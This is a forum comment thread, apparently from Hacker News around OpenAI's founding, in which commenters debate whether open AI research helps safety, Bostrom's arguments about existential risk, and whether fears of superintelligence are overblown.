On the whole, OpenAI sounds like a good idea. Making research broadly available helps avoid catastrophic "singleton"-like futures, while accelerating the progress we make in the present. In addition, if there's ever an AI SDK with effective methods of improving how "safe" a given AI is, most researchers would likely incorporate it into their work. It might not be "proven safe", but if there were a means to shut down a runaway process, or stop it from spreading to the Internet, or alert someone when it starts constructing androids shaped like Austrian bodybuilders, that would be handy. Responsible researchers should be doing this already, but as Scott points out, the ones we should be worried about aren't responsible researchers. Open AI development is in harmony with safe AI development, at least in some respects.

------

1. I have a significantly longer response that I scrapped because it might ultimately be better suited as a blog post or some such.

2. That's why it's called a power law distribution. Well, no, that's not it at all, but it seemed like a funny, flippant thing to say.

3. A universally beloved AI might be the equivalent of a Chinese Room where regardless of what message you send it, it responds with a vaguely complimentary yet motivational apothegm.

4. Bostrom tends to counterbalance this by arguing how much of our light cone (the "cosmic endowment") we might lose out on if we end up going extinct, due to, e.g., superhuman machine intelligence. Certainly "all of configurations of spacetime reachable from this point" outweighs the suffering of mere billions of people by some evaluations, but I ask myself "how much do I care about people thousands or millions of years into the future?", and also "if these guys have such a good handle on what constitutes the 'right' utility function, why haven't they shared it?". A more sarcastic variation of the above might be to remark that if they're able to approximate what people want with such high fidelity that they feel comfortable performing relativistic path integration over possible futures, then superintelligence is already here.

------

[+] ultim8k|10 years ago|reply
Yes! Everything that can push humanity forward, should be open!

[+] js8|10 years ago|reply
Fear of superintelligence is just another in a series of technological scares, after grey goo and cloning. There may be an explanation for why Musk and Thiel indulge in this: they sincerely believe that the smart rule (or at least can rule) the world.

But nothing is further from the truth. Humans are optimized to be cunning, to get positions of power in human society. AI won't be optimized in that way; therefore, it's probably going to lose for a long time. So an evil AI will probably be like an incredibly annoying autistic psychopath child who cannot comprehend human institutions, so its evil plans are totally obvious.

It's like with grey goo: biological systems like bacteria are heavily optimized to survive in very uncertain conditions, and any potential grey goo has to deal with that.

I think humanity is currently on track to blow itself up via global warming, so superintelligence is not really a comparable threat. If anything, the bigger threat is that we won't listen enough to the superintelligence. In fact, I think friendly AI will be something like Noam Chomsky: totally rational, right most of the time, fighting for it, telling us what should be done while disregarding our emotions. Many people find this annoying, too (including me and many very smart people).

Finally, if the hypothesis about superintelligence is right, why would a superintelligence want to evolve itself further? It could be beaten by the improved machine, too.